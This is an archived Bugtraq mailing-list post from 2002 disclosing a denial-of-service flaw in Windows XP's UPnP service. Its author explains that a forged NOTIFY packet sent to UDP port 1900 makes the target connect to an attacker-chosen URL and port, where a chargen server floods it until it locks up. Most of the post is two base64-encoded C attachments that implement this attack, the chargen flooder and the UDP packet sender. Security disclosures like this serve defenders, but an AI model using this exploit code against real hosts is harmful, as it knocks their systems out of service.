[23788] in bugtraq
UPNP Denial of Service
daemon@ATHENA.MIT.EDU (Gabriel Maggiotti)
Wed Jan 9 23:20:02 2002
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----_=_NextPart_001_01C19915.7D29A2BD"
Date: Wed, 9 Jan 2002 10:56:51 -0300
Message-ID: <BABA092F5BB47847AF2A72C6539EC37F6CA7E8@cdo01.biycsa.net>
From: "Gabriel Maggiotti" <gmaggiotti@biycsa.com.ar>
To: <bugtraq@securityfocus.com>
------_=_NextPart_001_01C19915.7D29A2BD
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
We develop a code baseline to test the UPNP DOS. The dos consists in
sending a udp packet to port 1900 with a NOTIFY request. This request
has a URL that XP uses to open a tcp connection. The XP does not
sanitize this request so whatever URL and port could be specified. Once
the tcp connection is opened, a chargen code fills the XP memory and the
machine gets into an unstable state with a 100% of cpu utilization.=20
Gabriel Maggiotti, Fernando Oubi=F1a
<<chargen.c>> <<upnp_udp.c>>=20
------_=_NextPart_001_01C19915.7D29A2BD
Content-Type: application/octet-stream;
name="chargen.c"
Content-Transfer-Encoding: base64
Content-Description: chargen.c
Content-Disposition: attachment;
filename="chargen.c"
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwMzQpaHR0cDovL3FiMHgubmV0L2V4cGxvaXRz
L2NoYXJnZW4uYyAtLT4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBj
aGFyc2V0PXdpbmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250
ZW50PSJNU0hUTUwgNS4wMC4yOTE5LjYzMDciIG5hbWU9R0VORVJBVE9SPjwvSEVBRD4NCjxCT0RZ
PjxYTVA+LyoNCiAqIENoYXJnZW4gU2VydmVyDQogKg0KICogUnVuOiAuL2NoYXJnZW4gPGNoYXJn
ZW5fcG9ydD4NCiAqDQogKg0KICogQXV0aG9yOiAgICAgIEdhYnJpZWwgTWFnZ2lvdHRpLCBGZXJu
YW5kbyBPdWJp8WENCiAqIEVtYWlsOiAgICAgICBnbWFnZ2lvdEBjaXVkYWQuY29tLmFyLCBmb3Vi
aW5hQHFiMHgubmV0DQogKiBXZWJwYWdlOiAgICAgaHR0cDovL3FiMHgubmV0DQogKi8NCg0KI2lu
Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8ZXJybm8uaD4N
CiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy93YWl0
Lmg+DQojaW5jbHVkZSA8bWFsbG9jLmg+DQoNCiNkZWZpbmUgQkFDS0xPRwk1DQojZGVmaW5lIE1B
WAk1MDANCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQppbnQgdmlzaXQ9
MTsNCmludCBpOw0KaW50IHBvcnQ7DQppbnQgc29ja2ZkOw0KaW50IG5ld2ZkOw0KaW50IG51bWJ5
dGVzOw0KY2hhciBidWZbTUFYXTsNCmNoYXIgZGllZGJ1ZlsxMDI0XTsNCg0KCXN0cnVjdCBzb2Nr
YWRkcl9pbiBteV9hZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiB0aGVpcl9hZGRyOw0KCWludCBz
aW5fc2l6ZTsNCg0KCWlmKGFyZ2MhPTIpIHsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiAlcyA8
Y2hhcmdlbl9wb3J0PlxuIixhcmd2WzBdKTsNCgkJcmV0dXJuIDE7DQoJfQ0KCXBvcnQ9YXRvaShh
cmd2WzFdKTsNCg0KCWlmKCAoc29ja2ZkPXNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkp
ID09IC0xKQ0KCXsNCgkJcGVycm9yKCJzb2NrZXQiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCglteV9h
ZGRyLnNpbl9mYW1pbHk9QUZfSU5FVDsNCglteV9hZGRyLnNpbl9wb3J0PWh0b25zKHBvcnQpOw0K
CW15X2FkZHIuc2luX2FkZHIuc19hZGRyPWh0b25sKElOQUREUl9BTlkpOw0KCWJ6ZXJvKCAmKG15
X2FkZHIuc2luX3plcm8pLDgpOw0KDQoJaWYoIGJpbmQoc29ja2ZkLCAoc3RydWN0IHNvY2thZGRy
ICopICZteV9hZGRyLFwNCgkJc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikgKSA9PSAtMSkNCgl7DQoJ
CXBlcnJvcigiYmluZCIpOw0KCQlleGl0KDEpOw0KCX0NCg0KDQoJaWYoIGxpc3Rlbihzb2NrZmQs
IEJBQ0tMT0cpID09IC0xKQ0KCXsNCgkJcGVycm9yKCJsaXN0ZW4iKTsNCgkJZXhpdCgxKTsNCgl9
DQoNCglmb3IoaT0wO2k8MTAyNDtpKyspDQoJCWRpZWRidWZbaV0gPSAncSc7DQoNCgl3aGlsZSgx
KSANCgl7CQ0KCQlzaW5fc2l6ZT1zaXplb2YoIHN0cnVjdCBzb2NrYWRkcl9pbik7DQoJCWlmKCAo
bmV3ZmQ9YWNjZXB0KHNvY2tmZCwoc3RydWN0IHNvY2thZGRyKikmdGhlaXJfYWRkcixcDQoJCQkg
JnNpbl9zaXplKSk9PSAtMSkNCgkJew0KCQkJcGVycm9yKCJhY2NlcHQiKTsNCgkJCWV4aXQoMSk7
DQoJCX0NCgkJcHJpbnRmKCJWaXNpdCBudW1iZXI6ICVkXG4iLHZpc2l0KyspOw0KDQoJCWlmKCFm
b3JrKCkpIA0KCQl7DQoJCQlpbnQgaT0xOw0KCQkJaWYoIChudW1ieXRlcz1yZWN2KG5ld2ZkLGJ1
ZixNQVgsMCkpPT0tMSApIA0KCQkJew0KCQkJCXBlcnJvcigicmVjdiIpOw0KCQkJCWV4aXQoMSk7
DQoJCQl9DQoJDQoJCQlidWZbbnVtYnl0ZXNdPSdcMCc7DQoJCQlwcmludGYoIiVzXG4iLGJ1Zik7
DQoJDQoJCQl3aGlsZSgxKQ0KCQkJew0KCQkJCWlmKHNlbmQobmV3ZmQsZGllZGJ1ZiwxMDI0LDAp
ID09LTEpDQoJCQkJew0KICAgICAgICAJCQkJcGVycm9yKCJzZW5kIik7DQogICAgICAgIAkJCQll
eGl0KDApOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCX0NCmNsb3NlKG5ld2ZkKTsNCn0NCjwvWE1QPjwv
Qk9EWT48L0hUTUw+DQo=
------_=_NextPart_001_01C19915.7D29A2BD
Content-Type: application/octet-stream;
name="upnp_udp.c"
Content-Transfer-Encoding: base64
Content-Description: upnp_udp.c
Content-Disposition: attachment;
filename="upnp_udp.c"
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdp
bmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+PC9IRUFEPg0KPEJPRFk+PFhNUD4v
KiANCiAqIFdpbk1FL1hQIFVQTlAgRDBTICANCiAqDQogKiAuL3VwbnBfdWRwIDxyZW1vdGVfaG9z
dG5hbWU+IDxzcG9vZmZlZF9ob3N0PiA8Y2hhcmdlbl9wb3J0Pg0KICoNCiAqIEF1dGhvcnM6ICAg
ICBHYWJyaWVsIE1hZ2dpb3R0aSwgRmVybmFuZG8gT3ViafFhDQogKiBFbWFpbDogICAgICAgZ21h
Z2dpb3RAY2l1ZGFkLmNvbS5hciwgZm91YmluYUBxYjB4Lm5ldA0KICogV2VicGFnZTogICAgIGh0
dHA6Ly9xYjB4Lm5ldA0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0cmlu
Zy5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNp
bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUg
PHN5cy93YWl0Lmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8ZmNudGwuaD4NCg0K
I2RlZmluZSBNQVgJMTAwMA0KI2RlZmluZSBQT1JUCTE5MDANCg0KDQpjaGFyICpzdHJfcmVwbGFj
ZShjaGFyICpyZXAsIGNoYXIgKm9yaWcsIGNoYXIgKnN0cmluZykNCnsNCmludCBsZW49c3RybGVu
KG9yaWcpOw0KY2hhciBidWZbTUFYXT0iIjsNCmNoYXIgKnB0PXN0cnN0cihzdHJpbmcsb3JpZyk7
DQoNCnN0cm5jcHkoYnVmLHN0cmluZywgcHQtc3RyaW5nICk7DQpzdHJjYXQoYnVmLHJlcCk7DQpz
dHJjYXQoYnVmLHB0K3N0cmxlbihvcmlnKSk7DQpzdHJjcHkoc3RyaW5nLGJ1Zik7DQpyZXR1cm4g
c3RyaW5nOw0KfQ0KDQovKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KDQppbnQgbWFpbihpbnQgYXJnYyxj
aGFyICphcmd2W10pDQp7DQoJaW50IHNvY2tmZCxpOw0KCWludCBudW1ieXRlczsNCglpbnQgbnVt
X3NvY2tzOw0KCWludCBhZGRyX2xlbjsNCgljaGFyIHJlY2l2ZV9idWZmZXJbTUFYXT0iIjsNCg0K
CWNoYXIgc2VuZF9idWZmZXJbTUFYXT0NCgkiTk9USUZZICogSFRUUC8xLjFcclxuSE9TVDogMjM5
LjI1NS4yNTUuMjUwOjE5MDBcclxuIg0KCSJDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTFcclxuTE9D
QVRJT046IGh0dHA6Ly93d3cuaG9zdC5jb206cG9ydC9cclxuIg0KCSJOVDogdXJuOnNjaGVtYXMt
dXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxXHJcbiINCgkiTlRTOiBzc2Rw
OmFsaXZlXHJcblNFUlZFUjogUUIwWC8yMDEgVVBuUC8xLjAgcHJvdWN0LzEuMVxyXG4iDQoJIlVT
TjogdXVpZDpRQjBYXHJcblxyXG5cclxuIjsNCg0KCWNoYXIgKmF1eD1zZW5kX2J1ZmZlcjsNCglz
dHJ1Y3QgaG9zdGVudCAqaGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHRoZWlyX2FkZHI7DQoNCglp
ZihhcmdjIT00KQ0KCXsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiVzIDxyZW1vdGVfaG9zdG5h
bWU+ICJcDQoJCQkiPHNwb29mZmVkX2hvc3Q+IDxjaGFyZ2VuX3BvcnQ+XG4iLGFyZ3ZbMF0pOw0K
CQlleGl0KDEpOw0KCX0NCg0KDQoJYXV4PXN0cl9yZXBsYWNlKGFyZ3ZbMl0sInd3dy5ob3N0LmNv
bSIsc2VuZF9idWZmZXIpOw0KCWF1eD1zdHJfcmVwbGFjZShhcmd2WzNdLCJwb3J0IixzZW5kX2J1
ZmZlcik7DQoNCglpZigoaGU9Z2V0aG9zdGJ5bmFtZShhcmd2WzFdKSk9PU5VTEwpDQoJew0KCQlw
ZXJyb3IoImdldGhvc3RieW5hbWUiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCg0KCWlmKCAoc29ja2Zk
PXNvY2tldChBRl9JTkVULFNPQ0tfREdSQU0sMCkpID09IC0xKSB7DQoJCXBlcnJvcigic29ja2V0
Iik7IGV4aXQoMSk7DQoJfQ0KDQoJdGhlaXJfYWRkci5zaW5fZmFtaWx5PUFGX0lORVQ7DQoJdGhl
aXJfYWRkci5zaW5fcG9ydD1odG9ucyhQT1JUKTsNCgl0aGVpcl9hZGRyLnNpbl9hZGRyPSooKHN0
cnVjdCBpbl9hZGRyKiloZS0+aF9hZGRyKTsNCgliemVybygmKHRoZWlyX2FkZHIuc2luX3plcm8p
LDgpOw0KDQoJaWYoIChudW1ieXRlcz1zZW5kdG8oc29ja2ZkLHNlbmRfYnVmZmVyLHN0cmxlbihz
ZW5kX2J1ZmZlciksMCxcDQoJKHN0cnVjdCBzb2NrYWRkciAqKSZ0aGVpcl9hZGRyLCBzaXplb2Yo
c3RydWN0IHNvY2thZGRyKSkpID09LTEpDQoJew0KCQlwZXJyb3IoInNlbmQiKTsNCgkJZXhpdCgw
KTsNCgl9DQoJY2xvc2Uoc29ja2ZkKTsNCg0KcmV0dXJuIDA7DQp9DQoNCg0KPC9YTVA+PC9CT0RZ
PjwvSFRNTD4NCg==
------_=_NextPart_001_01C19915.7D29A2BD--
